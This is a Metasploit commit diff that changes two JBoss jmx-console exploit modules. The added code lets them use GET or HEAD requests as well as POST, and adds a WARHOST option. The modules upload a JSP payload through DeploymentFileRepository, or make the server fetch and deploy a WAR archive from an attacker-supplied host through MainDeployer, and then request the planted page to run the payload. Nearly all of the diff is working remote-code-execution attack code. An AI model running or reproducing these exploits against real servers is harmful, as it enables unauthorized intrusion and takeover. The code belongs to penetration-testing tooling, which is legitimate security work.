make sure to use correct verbs, thanks mc!
git-svn-id: file:///home/svn/framework3/trunk@9285 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
4cfc84a2e4
commit
711e08b5e9
|
@ -67,21 +67,40 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
fname = rand_text_alpha_upper(rand(5) + 1)
|
fname = rand_text_alpha_upper(rand(5) + 1)
|
||||||
|
|
||||||
|
data = 'action=invokeOp'
|
||||||
|
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
|
||||||
|
data << '&methodIndex=5'
|
||||||
|
data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH'])
|
||||||
|
data << '&arg1=' + fname
|
||||||
|
data << '&arg2=.jsp'
|
||||||
|
data << '&arg3=' + Rex::Text.uri_encode(payload.encoded)
|
||||||
|
data << '&arg4=True'
|
||||||
|
|
||||||
|
if (datastore['VERB'] == "POST")
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => '/jmx-console/HtmlAdaptor',
|
'uri' => '/jmx-console/HtmlAdaptor',
|
||||||
'method' => datastore['VERB'],
|
'method' => datastore['VERB'],
|
||||||
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
|
'data' => data
|
||||||
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
|
|
||||||
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
|
|
||||||
})
|
})
|
||||||
|
else
|
||||||
|
res = send_request_cgi(
|
||||||
|
{
|
||||||
|
'uri' => '/jmx-console/HtmlAdaptor;index.jsp?' + data,
|
||||||
|
'method' => datastore['VERB'],
|
||||||
|
})
|
||||||
|
end
|
||||||
|
|
||||||
if (res.code == 200)
|
if (res.code == 200)
|
||||||
print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...")
|
print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...")
|
||||||
|
verb = 'GET'
|
||||||
|
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
|
||||||
|
verb = 'HEAD'
|
||||||
|
end
|
||||||
send_request_raw(
|
send_request_raw(
|
||||||
{
|
{
|
||||||
'uri' => datastore['URI'] + fname + '.jsp',
|
'uri' => datastore['URI'] + fname + '.jsp',
|
||||||
'method' => 'GET',
|
'method' => verb,
|
||||||
})
|
})
|
||||||
else
|
else
|
||||||
print_error("Denied...")
|
print_error("Denied...")
|
||||||
|
|
|
@ -73,6 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
|
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
|
||||||
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
|
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
|
||||||
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST' ]),
|
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST' ]),
|
||||||
|
OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -149,7 +150,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Path' => resource_uri
|
'Path' => resource_uri
|
||||||
}})
|
}})
|
||||||
|
|
||||||
print_status("Making the request to the MainDeployer...")
|
if (datastore['WARHOST'])
|
||||||
|
service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
|
||||||
|
end
|
||||||
|
#method_index = jboss_detect_method_index
|
||||||
|
print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
|
||||||
|
if (datastore['VERB'] == "POST")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => datastore['VERB'],
|
'method' => datastore['VERB'],
|
||||||
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||||
|
@ -163,7 +169,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
#'methodIndex' => '23', # jboss 3.2.7
|
#'methodIndex' => '23', # jboss 3.2.7
|
||||||
'arg0' => service_url
|
'arg0' => service_url
|
||||||
}
|
}
|
||||||
}, 20)
|
})
|
||||||
|
else
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => datastore['VERB'],
|
||||||
|
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||||
|
'vars_get' =>
|
||||||
|
{
|
||||||
|
'action' => 'invokeOp',
|
||||||
|
'name' => 'jboss.system:service=MainDeployer',
|
||||||
|
# deploy via java.net.URL
|
||||||
|
'methodIndex' => '3', # jboss 4.0.5
|
||||||
|
#'methodIndex' => '21', # jboss 3.0.8
|
||||||
|
#'methodIndex' => '23', # jboss 3.2.7
|
||||||
|
'arg0' => service_url
|
||||||
|
}
|
||||||
|
})
|
||||||
|
end
|
||||||
if (! res)
|
if (! res)
|
||||||
raise RuntimeError, "Unable to deploy WAR archive [No Response]"
|
raise RuntimeError, "Unable to deploy WAR archive [No Response]"
|
||||||
end
|
end
|
||||||
|
@ -194,9 +216,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# EXECUTE
|
# EXECUTE
|
||||||
#
|
#
|
||||||
print_status("Executing #{app_base}...")
|
print_status("Executing #{app_base}...")
|
||||||
|
verb = 'GET'
|
||||||
|
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
|
||||||
|
verb = 'HEAD'
|
||||||
|
end
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => '/' + app_base + '/' + jsp_name + '.jsp',
|
'uri' => '/' + app_base + '/' + jsp_name + '.jsp',
|
||||||
'method' => 'GET'
|
'method' => verb
|
||||||
}, 20)
|
}, 20)
|
||||||
|
|
||||||
if (! res)
|
if (! res)
|
||||||
|
|
Loading…
Reference in New Issue